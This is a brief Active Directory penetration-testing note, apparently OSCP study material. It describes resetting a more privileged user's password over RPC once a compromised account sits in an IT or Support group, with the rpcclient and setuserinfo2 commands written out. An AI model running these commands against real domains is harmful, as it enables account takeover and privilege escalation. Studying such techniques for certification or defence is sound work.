// notes/ Active Directory
🏛️

Post Compromise Attacks Rpc Password Change

{% hint style="info" %}

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_rpc-password-change

RPC Password Change

{% hint style="info" %} If your compromised user is ever apart of a "Support" "IT" or "Admin" group, try resetting another user with more privileges password {% endhint %}

code
01rpcclient -N 192.168.193.40 -U IT_User%haze1988
code
01setuserinfo2 John.Smith 23 'Pwned123!'